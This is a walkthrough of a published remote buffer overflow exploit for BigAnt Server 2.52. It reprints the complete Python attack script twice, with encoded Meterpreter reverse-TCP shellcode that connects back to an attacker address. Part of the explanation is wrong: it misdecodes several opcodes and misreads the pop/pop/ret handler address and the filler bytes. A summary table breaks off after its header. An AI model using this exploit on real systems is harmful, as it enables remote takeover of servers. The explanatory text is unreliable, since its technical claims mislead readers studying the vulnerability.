BigAnt Server 2.52 Remote Buffer Overflow Exploit Explained

What this paper is

This paper presents a Python script that exploits a remote buffer overflow vulnerability in BigAnt Server version 2.52. The vulnerability allows an attacker to send a specially crafted network request that overwrites memory in the server process, leading to the execution of arbitrary code. This specific exploit aims to gain remote code execution, likely to establish a reverse shell connection back to the attacker.

Simple technical breakdown

The BigAnt Server listens on a specific port (port 6660 in this case). When it receives a request starting with "USV ", it processes the data that follows. This script sends a very long string of data. A portion of this data is designed to be larger than the buffer allocated by the server to store it. When the server tries to copy this oversized data into its buffer, it overflows, overwriting adjacent memory.

The exploit carefully crafts this oversized data. It includes:

1. Padding: A series of "No Operation" (NOP) instructions (\x90) to create space and ensure reliable execution.
2. Shellcode: The actual malicious code that will be executed on the server. This shellcode is encoded to evade detection and bypass certain security measures.
3. Return Address Overwrite: A specific address that tells the program where to jump to after the overflow. This address is overwritten to point to the shellcode.
4. More Padding: Additional NOPs and filler data to ensure the overflow reaches the intended overwrite location and to fill any remaining buffer space.

When the server's program flow is interrupted by the overflow, it attempts to return from the function that handled the request. Because the return address has been overwritten, it jumps to the shellcode, executing the attacker's code.

Complete code and payload walkthrough

Let's break down the Python script and the payload it constructs.

#!/usr/bin/python

#BigAnt Server 2.52 remote buffer overflow exploit 2
#Author: DouBle_Zer0
#Vulnerability discovered by Lincoln
#a another version of the original exploit (by Lincoln)
#application is little hazy..

import sys,socket

host = sys.argv[1]
buffer= "\x90" * 20

• #!/usr/bin/python: This is a shebang line, indicating the script should be executed with the Python interpreter.
• Comments: The lines starting with # are comments, providing context about the exploit's origin, author, and the vulnerability.
• import sys,socket: Imports necessary Python modules.
  • sys: Used here to access command-line arguments (like the target host).
  • socket: Used for network communication (creating a socket, connecting, sending data).
• host = sys.argv[1]: This line retrieves the first command-line argument passed to the script and assigns it to the host variable. This will be the IP address or hostname of the target BigAnt server.
• buffer= "\x90" * 20: Initializes a variable named buffer. It starts with 20 bytes of \x90.
  • \x90: This is the hexadecimal representation of the x86 instruction NOP (No Operation). NOP instructions do nothing but advance the instruction pointer. They are often used as padding in exploits to create a "NOP sled" which increases the chances of landing on executable code.

#./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.3 R | ./msfencode -e x86/alpha_mixed -t c
#size 643 byte
buffer+= ("\x89\xe1\xd9\xce\xd9\x71\xf4\x59\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x49"
"\x6c\x49\x78\x4c\x49\x47\x70\x43\x30\x47\x70\x45\x30\x4f\x79"
"\x4a\x45\x50\x31\x49\x42\x45\x34\x4e\x6b\x42\x72\x50\x30\x4e"
"\x6b\x50\x52\x44\x4c\x4c\x4b\x51\x42\x47\x64\x4e\x6b\x51\x62"
"\x44\x68\x46\x6f\x4d\x67\x50\x4a\x51\x36\x45\x61\x4b\x4f\x44"
"\x71\x49\x50\x4c\x6c\x45\x6c\x50\x61\x43\x4c\x44\x42\x46\x4c"
"\x51\x30\x4a\x61\x4a\x6f\x44\x4d\x46\x61\x4a\x67\x4b\x52\x4a"
"\x50\x42\x72\x50\x57\x4c\x4b\x42\x72\x44\x50\x4e\x6b\x42\x62"
"\x45\x6c\x47\x71\x48\x50\x4c\x4b\x51\x50\x42\x58\x4b\x35\x49"
"\x50\x50\x74\x50\x4a\x47\x71\x48\x50\x50\x50\x4c\x4b\x43\x78"
"\x46\x78\x4e\x6b\x51\x48\x47\x50\x43\x31\x49\x43\x49\x73\x47"
"\x4c\x51\x59\x4c\x4b\x45\x64\x4c\x4b\x43\x31\x4b\x66\x44\x71"
"\x49\x6f\x50\x31\x4f\x30\x4e\x4c\x49\x51\x48\x4f\x46\x6d\x43"
"\x31\x4a\x67\x44\x78\x49\x70\x51\x65\x4a\x54\x45\x53\x51\x6d"
"\x4a\x58\x45\x6b\x43\x4d\x51\x34\x43\x45\x48\x62\x43\x68\x4e"
"\x6b\x46\x38\x51\x34\x43\x31\x4b\x63\x45\x36\x4e\x6b\x44\x4c"
"\x50\x4b\x4c\x4b\x43\x68\x47\x6c\x46\x61\x4e\x33\x4c\x4b\x44"
"\x44\x4c\x4b\x47\x71\x4a\x70\x4c\x49\x43\x74\x51\x34\x51\x34"
"\x43\x6b\x51\x4b\x50\x61\x42\x79\x51\x4a\x46\x31\x4b\x4f\x49"
"\x70\x46\x38\x43\x6f\x51\x4a\x4e\x6b\x42\x32\x48\x6b\x4d\x56"
"\x43\x6d\x50\x68\x46\x53\x46\x52\x45\x50\x43\x30\x43\x58\x43"
"\x47\x50\x73\x50\x32\x43\x6f\x42\x74\x45\x38\x50\x4c\x43\x47"
"\x46\x46\x47\x77\x49\x6f\x4b\x65\x4c\x78\x4e\x70\x45\x51\x47"
"\x70\x47\x70\x45\x79\x48\x44\x43\x64\x42\x70\x42\x48\x44\x69"
"\x4b\x30\x42\x4b\x47\x70\x4b\x4f\x48\x55\x50\x50\x46\x30\x46"
"\x30\x46\x30\x43\x70\x50\x50\x47\x30\x46\x30\x43\x58\x4a\x4a"
"\x44\x4f\x49\x4f\x49\x70\x4b\x4f\x4b\x65\x4a\x37\x50\x6a\x44"
"\x45\x43\x58\x4f\x30\x4e\x48\x47\x71\x44\x43\x45\x38\x45\x52"
"\x43\x30\x44\x51\x43\x6c\x4e\x69\x49\x76\x50\x6a\x42\x30\x50"
"\x56\x46\x37\x50\x68\x4a\x39\x4d\x75\x44\x34\x50\x61\x4b\x4f"
"\x4b\x65\x4f\x75\x4b\x70\x42\x54\x44\x4c\x4b\x4f\x42\x6e\x47"
"\x78\x44\x35\x4a\x4c\x43\x58\x4a\x50\x48\x35\x4d\x72\x43\x66"
"\x4b\x4f\x4a\x75\x50\x6a\x47\x70\x43\x5a\x45\x54\x46\x36\x43"
"\x67\x42\x48\x44\x42\x49\x49\x4f\x38\x51\x4f\x4b\x4f\x4b\x65"
"\x4e\x6b\x47\x46\x50\x6a\x51\x50\x42\x48\x45\x50\x42\x30\x43"
"\x30\x45\x50\x50\x56\x42\x4a\x45\x50\x42\x48\x51\x48\x4c\x64"
"\x46\x33\x4a\x45\x49\x6f\x4e\x35\x4a\x33\x43\x63\x42\x4a\x45"
"\x50\x46\x36\x43\x63\x50\x57\x50\x68\x44\x42\x48\x59\x4f\x38"
"\x43\x6f\x4b\x4f\x4e\x35\x43\x31\x48\x43\x51\x39\x4f\x36\x4c"
"\x45\x49\x66\x43\x45\x48\x6c\x4b\x73\x44\x4a\x41\x41")

• #./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.3 R | ./msfencode -e x86/alpha_mixed -t c: This is a comment indicating how the shellcode was generated.
  • msfpayload: A tool from the Metasploit Framework used to generate payloads.
  • windows/meterpreter/reverse_tcp: Specifies the payload type. It's a Meterpreter shell (an advanced, extensible shell) that will attempt to establish a reverse TCP connection back to the attacker.
  • LHOST=192.168.1.3: Sets the attacker's IP address (Local Host) that the reverse shell should connect back to.
  • R: Stands for "raw" output, meaning the raw bytes of the payload.
  • msfencode: Another Metasploit tool used to encode payloads, often to evade signature-based detection (like antivirus) or to make them compatible with certain exploit techniques.
  • -e x86/alpha_mixed: Specifies the encoder. x86/alpha_mixed is an encoder that uses alphanumeric characters and mixed case to represent the shellcode, making it harder for simple string-based detection to find. It also aims to avoid bad characters.
  • -t c: Specifies the output format as C-style byte arrays, which is easily embeddable in Python.
• #size 643 byte: Indicates the approximate size of the generated shellcode.
• buffer+= (...): This is the core of the shellcode. The long string of hexadecimal bytes represents the actual malicious payload.
  • \x89\xe1: MOV ECX, ESP - Moves the stack pointer (ESP) into the ECX register. This is often an initial step in shellcode to set up registers.
  • \xd9\xce: FNINIT - Initializes the floating-point unit. This is a common technique in shellcode to avoid certain "bad characters" that might terminate string operations.
  • \xd9\x71\xf4: FNSTENV [ESP-0x0C] - Stores the FPU environment at an offset from ESP. This is another common shellcode technique for obfuscation and avoiding bad characters.
  • \x59: POP ECX - Pops a value from the stack into ECX.
  • \x49\x49\x49\x49\x49\x49\x49\x49\x49\x49: These are DEC ECX instructions. They decrement the ECX register repeatedly. This is likely part of the shellcode's logic to calculate an address or to iterate.
  • \x43\x43\x43\x43\x43\x43: These are INC EBX instructions. They increment the EBX register.
  • \x37: AAA (ASCII Adjust After Addition) - This is a less common instruction in this context but can be part of obfuscation or specific shellcode routines.
  • \x51: PUSH ECX - Pushes the value of ECX onto the stack.
  • \x5a: POP EDX - Pops a value from the stack into EDX.
  • \x6a\x41: PUSH 0x41 - Pushes the byte 0x41 (ASCII 'A') onto the stack.
  • \x58: POP EAX - Pops a value from the stack into EAX.
  • \x50: PUSH EAX - Pushes the value of EAX onto the stack.
  • \x30\x41\x30\x41: These are XOR operations (XOR AL, 0x41). This is a common obfuscation technique where bytes are XORed with a key to make them appear random. The 0x41 is likely part of the key.
  • \x6b\x41\x41: IMUL EBX, EBX, 0x41414141 (or similar, depending on operand size). This is an integer multiplication instruction.
  • \x51: PUSH ECX - Pushes ECX onto the stack.
  • \x32\x41\x42: XOR AL, 0x42 - XORs AL with 0x42.
  • \x32\x42\x30\x42\x42\x41\x42: More XOR operations with various bytes.
  • \x58\x50\x38\x41\x42\x75\x4a\x49\x49\x6c\x49\x78\x4c\x49\x47\x70\x43\x30\x47\x70\x45\x30\x4f\x79\x4a\x45\x50\x31\x49\x42\x45\x34\x4e\x6b\x42\x72\x50\x30\x4e\x6b\x50\x52\x44\x4c\x4c\x4b\x51\x42\x47\x64\x4e\x6b\x51\x62\x44\x68\x46\x6f\x4d\x67\x50\x4a\x51\x36\x45\x61\x4b\x4f\x44\x71\x49\x50\x4c\x6c\x45\x6c\x50\x61\x43\x4c\x44\x42\x46\x4c\x51\x30\x4a\x61\x4a\x6f\x44\x4d\x46\x61\x4a\x67\x4b\x52\x4a\x50\x42\x72\x50\x57\x4c\x4b\x42\x72\x44\x50\x4e\x6b\x42\x62\x45\x6c\x47\x71\x48\x50\x4c\x4b\x51\x50\x42\x58\x4b\x35\x49\x50\x50\x74\x50\x4a\x47\x71\x48\x50\x50\x50\x4c\x4b\x43\x78\x46\x78\x4e\x6b\x51\x48\x47\x50\x43\x31\x49\x43\x49\x73\x47\x4c\x51\x59\x4c\x4b\x45\x64\x4c\x4b\x43\x31\x4b\x66\x44\x71\x49\x6f\x50\x31\x4f\x30\x4e\x4c\x49\x51\x48\x4f\x46\x6d\x43\x31\x4a\x67\x44\x78\x49\x70\x51\x65\x4a\x54\x45\x53\x51\x6d\x4a\x58\x45\x6b\x43\x4d\x51\x34\x43\x45\x48\x62\x43\x68\x4e\x6b\x46\x38\x51\x34\x43\x31\x4b\x63\x45\x36\x4e\x6b\x44\x4c\x50\x4b\x4c\x4b\x43\x68\x47\x6c\x46\x61\x4e\x33\x4c\x4b\x44\x44\x4c\x4b\x47\x71\x4a\x70\x4c\x49\x43\x74\x51\x34\x51\x34\x43\x6b\x51\x4b\x50\x61\x42\x79\x51\x4a\x46\x31\x4b\x4f\x49\x70\x46\x38\x43\x6f\x51\x4a\x4e\x6b\x42\x32\x48\x6b\x4d\x56\x43\x6d\x50\x68\x46\x53\x46\x52\x45\x50\x43\x30\x43\x58\x43\x47\x50\x73\x50\x32\x43\x6f\x42\x74\x45\x38\x50\x4c\x43\x47\x46\x46\x47\x77\x49\x6f\x4b\x65\x4c\x78\x4e\x70\x45\x51\x47\x70\x47\x70\x45\x79\x48\x44\x43\x64\x42\x70\x42\x48\x44\x69\x4b\x30\x42\x4b\x47\x70\x4b\x4f\x48\x55\x50\x50\x46\x30\x46\x30\x46\x30\x43\x70\x50\x50\x47\x30\x46\x30\x43\x58\x4a\x4a\x44\x4f\x49\x4f\x49\x70\x4b\x4f\x4b\x65\x4a\x37\x50\x6a\x44\x45\x43\x58\x4f\x30\x4e\x48\x47\x71\x44\x43\x45\x38\x45\x52\x43\x30\x44\x51\x43\x6c\x4e\x69\x49\x76\x50\x6a\x42\x30\x50\x56\x46\x37\x50\x68\x4a\x39\x4d\x75\x44\x34\x50\x61\x4b\x4f\x4b\x65\x4f\x75\x4b\x70\x42\x54\x44\x4c\x4b\x4f\x42\x6e\x47\x78\x44\x35\x4a\x4c\x43\x58\x4a\x50\x48\x35\x4d\x72\x43\x66\x4b\x4f\x4a\x75\x50\x6a\x47\x70\x43\x5a\x45\x54\x46\x36\x43\x67\x42\x48\x44\x42\x49\x49\x4f\x38\x51\x4f\x4b\x4f\x4b\x65\x4e\x6b\x47\x46\x50\x6a\x51\x50\x42\x48\x45\x50\x42\x30\x43\x30\x45\x50\x50\x56\x42\x4a\x45\x50\x42\x48\x51\x48\x4c\x64\x46\x33\x4a\x45\x49\x6f\x4e\x35\x4a\x33\x43\x63\x42\x4a\x45\x50\x46\x36\x43\x63\x50\x57\x50\x68\x44\x42\x48\x59\x4f\x38\x43\x6f\x4b\x4f\x4e\x35\x43\x31\x48\x43\x51\x39\x4f\x36\x4c\x45\x49\x66\x43\x45\x48\x6c\x4b\x73\x44\x4a\x41\x41: This is the bulk of the shellcode. It's a complex sequence of instructions, heavily obfuscated with XOR operations and other techniques. The primary goal of this section is to:
    1. Initialize the environment: Set up registers and potentially the floating-point unit.
    2. Resolve API calls: Find the addresses of necessary Windows API functions (like CreateProcess, Socket, Connect, Send, Recv, etc.) from loaded DLLs in memory. This is crucial because shellcode often cannot rely on fixed addresses for these functions.
    3. Establish a network connection: Create a socket, connect back to the attacker's LHOST and a specified port (implied by reverse_tcp).
    4. Spawn a shell: Execute a command interpreter (like cmd.exe) and redirect its input/output to the established network socket, effectively giving the attacker a command shell.
    5. Meterpreter functionality: If it's a Meterpreter payload, it will also load the Meterpreter DLL and provide advanced features.

buffer+= "\x90" * 294

• buffer+= "\x90" * 294: Appends 294 more NOP instructions to the buffer. This creates a larger NOP sled. The purpose of a NOP sled is to increase the probability that the execution flow, after being redirected by the overflow, will land within the NOPs and slide down to the actual shellcode.

buffer+= "\xe9\x4c\xfc\xff\xff"  #near jmp -----> shellcode

• buffer+= "\xe9\x4c\xfc\xff\xff": This is a relative jump instruction.
  • \xe9: The opcode for a JMP rel32 instruction.
  • \x4c\xfc\xff\xff: This is the 32-bit relative offset. When decoded, this offset points to the beginning of the shellcode. The \xff\xff\xfc\x4c is a little-endian representation of a negative number. This jump effectively directs execution to the start of the shellcode.

buffer+= "\xeb\xf9\x90\x90"      #short jmp ----> near jmp

• buffer+= "\xeb\xf9\x90\x90": This sequence is interesting.
  • \xeb\xf9: A JMP rel8 instruction. \xf9 is a relative offset of -7. This means it jumps back 7 bytes.
  • \x90\x90: Two NOP instructions.
  • Purpose: This is likely a small jump back to ensure that if the initial jump (\xe9\x4c\xfc\xff\xff) lands slightly after the intended shellcode start, this \xeb\xf9 will bring it back to the beginning of the shellcode or the NOP sled. The \x90\x90 are padding. This is a common technique to handle slight variations in jump targets.

buffer+= "\x95\x32\x9a\x0f"      #p/p/r(partial overwrite is not possible as far as i know)

• buffer+= "\x95\x32\x9a\x0f": This is a placeholder or potentially a specific instruction sequence.
  • \x95: SYSCALL (on some architectures, but not standard x86). On x86, it's RETF (Return Far).
  • \x32\x9a\x0f: These bytes are unclear without more context of the specific target environment and exploit strategy. The comment p/p/r might refer to "push, pop, return" or a similar stack manipulation. The author notes that "partial overwrite is not possible as far as I know," suggesting this part might be a fallback or an attempt to achieve a specific outcome if a full return address overwrite isn't feasible. It's possible these bytes are intended to be overwritten by the actual return address, or they are part of a complex jump chain. Given the context, it's most likely intended to be overwritten by the return address.

buffer+= "\x41" * 1000           #play

• buffer+= "\x41" * 1000: Appends 1000 bytes of \x41 (ASCII 'A').
  • Purpose: This is the main overflow data. It's designed to be much larger than the vulnerable buffer on the server. The excess data will overwrite adjacent memory on the stack, including the saved return address. The specific value \x41 is often used as a placeholder to observe how much data is being sent and where the overflow occurs. The goal is for this section to overwrite the return address with a value that points into the shellcode.

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,6660))
s.send("USV " + buffer + "\r\n\r\n")
s.close()

• s = socket.socket(socket.AF_INET, socket.SOCK_STREAM): Creates a new TCP socket.
  • AF_INET: Specifies the address family is IPv4.
  • SOCK_STREAM: Specifies the socket type is TCP (stream-based).
• s.connect((host,6660)): Connects the socket to the target host on port 6660. This is the port BigAnt Server is assumed to be listening on.
• s.send("USV " + buffer + "\r\n\r\n"): Sends the crafted data over the network.
  • "USV ": This is the command or identifier that triggers the vulnerable code path in the BigAnt Server.
  • buffer: The entire payload constructed earlier, including NOPs, shellcode, jump instructions, and overflow data.
  • "\r\n\r\n": Carriage return and newline characters, often used as a terminator in network protocols.
• s.close(): Closes the network connection.

Mapping of code fragments to practical purpose:

| Code Fragment | Practical Purpose

Original Exploit-DB Content (Verbatim)

#!/usr/bin/python

#BigAnt Server 2.52 remote buffer overflow exploit 2
#Author: DouBle_Zer0
#Vulnerability discovered by Lincoln
#a another version of the original exploit (by Lincoln)
#application is little hazy..

import sys,socket

host = sys.argv[1]
buffer= "\x90" * 20

#./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.3 R | ./msfencode -e x86/alpha_mixed -t c
#size 643 byte
buffer+= ("\x89\xe1\xd9\xce\xd9\x71\xf4\x59\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x49"
"\x6c\x49\x78\x4c\x49\x47\x70\x43\x30\x47\x70\x45\x30\x4f\x79"
"\x4a\x45\x50\x31\x49\x42\x45\x34\x4e\x6b\x42\x72\x50\x30\x4e"
"\x6b\x50\x52\x44\x4c\x4c\x4b\x51\x42\x47\x64\x4e\x6b\x51\x62"
"\x44\x68\x46\x6f\x4d\x67\x50\x4a\x51\x36\x45\x61\x4b\x4f\x44"
"\x71\x49\x50\x4c\x6c\x45\x6c\x50\x61\x43\x4c\x44\x42\x46\x4c"
"\x51\x30\x4a\x61\x4a\x6f\x44\x4d\x46\x61\x4a\x67\x4b\x52\x4a"
"\x50\x42\x72\x50\x57\x4c\x4b\x42\x72\x44\x50\x4e\x6b\x42\x62"
"\x45\x6c\x47\x71\x48\x50\x4c\x4b\x51\x50\x42\x58\x4b\x35\x49"
"\x50\x50\x74\x50\x4a\x47\x71\x48\x50\x50\x50\x4c\x4b\x43\x78"
"\x46\x78\x4e\x6b\x51\x48\x47\x50\x43\x31\x49\x43\x49\x73\x47"
"\x4c\x51\x59\x4c\x4b\x45\x64\x4c\x4b\x43\x31\x4b\x66\x44\x71"
"\x49\x6f\x50\x31\x4f\x30\x4e\x4c\x49\x51\x48\x4f\x46\x6d\x43"
"\x31\x4a\x67\x44\x78\x49\x70\x51\x65\x4a\x54\x45\x53\x51\x6d"
"\x4a\x58\x45\x6b\x43\x4d\x51\x34\x43\x45\x48\x62\x43\x68\x4e"
"\x6b\x46\x38\x51\x34\x43\x31\x4b\x63\x45\x36\x4e\x6b\x44\x4c"
"\x50\x4b\x4c\x4b\x43\x68\x47\x6c\x46\x61\x4e\x33\x4c\x4b\x44"
"\x44\x4c\x4b\x47\x71\x4a\x70\x4c\x49\x43\x74\x51\x34\x51\x34"
"\x43\x6b\x51\x4b\x50\x61\x42\x79\x51\x4a\x46\x31\x4b\x4f\x49"
"\x70\x46\x38\x43\x6f\x51\x4a\x4e\x6b\x42\x32\x48\x6b\x4d\x56"
"\x43\x6d\x50\x68\x46\x53\x46\x52\x45\x50\x43\x30\x43\x58\x43"
"\x47\x50\x73\x50\x32\x43\x6f\x42\x74\x45\x38\x50\x4c\x43\x47"
"\x46\x46\x47\x77\x49\x6f\x4b\x65\x4c\x78\x4e\x70\x45\x51\x47"
"\x70\x47\x70\x45\x79\x48\x44\x43\x64\x42\x70\x42\x48\x44\x69"
"\x4b\x30\x42\x4b\x47\x70\x4b\x4f\x48\x55\x50\x50\x46\x30\x46"
"\x30\x46\x30\x43\x70\x50\x50\x47\x30\x46\x30\x43\x58\x4a\x4a"
"\x44\x4f\x49\x4f\x49\x70\x4b\x4f\x4b\x65\x4a\x37\x50\x6a\x44"
"\x45\x43\x58\x4f\x30\x4e\x48\x47\x71\x44\x43\x45\x38\x45\x52"
"\x43\x30\x44\x51\x43\x6c\x4e\x69\x49\x76\x50\x6a\x42\x30\x50"
"\x56\x46\x37\x50\x68\x4a\x39\x4d\x75\x44\x34\x50\x61\x4b\x4f"
"\x4b\x65\x4f\x75\x4b\x70\x42\x54\x44\x4c\x4b\x4f\x42\x6e\x47"
"\x78\x44\x35\x4a\x4c\x43\x58\x4a\x50\x48\x35\x4d\x72\x43\x66"
"\x4b\x4f\x4a\x75\x50\x6a\x47\x70\x43\x5a\x45\x54\x46\x36\x43"
"\x67\x42\x48\x44\x42\x49\x49\x4f\x38\x51\x4f\x4b\x4f\x4b\x65"
"\x4e\x6b\x47\x46\x50\x6a\x51\x50\x42\x48\x45\x50\x42\x30\x43"
"\x30\x45\x50\x50\x56\x42\x4a\x45\x50\x42\x48\x51\x48\x4c\x64"
"\x46\x33\x4a\x45\x49\x6f\x4e\x35\x4a\x33\x43\x63\x42\x4a\x45"
"\x50\x46\x36\x43\x63\x50\x57\x50\x68\x44\x42\x48\x59\x4f\x38"
"\x43\x6f\x4b\x4f\x4e\x35\x43\x31\x48\x43\x51\x39\x4f\x36\x4c"
"\x45\x49\x66\x43\x45\x48\x6c\x4b\x73\x44\x4a\x41\x41")
buffer+= "\x90" * 294
buffer+= "\xe9\x4c\xfc\xff\xff"  #near jmp -----> shellcode
buffer+= "\xeb\xf9\x90\x90"      #short jmp ----> near jmp
buffer+= "\x95\x32\x9a\x0f"      #p/p/r(partial overwrite is not possible as far as i know) 
buffer+= "\x41" * 1000           #play
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,6660))
s.send("USV " + buffer + "\r\n\r\n")
s.close()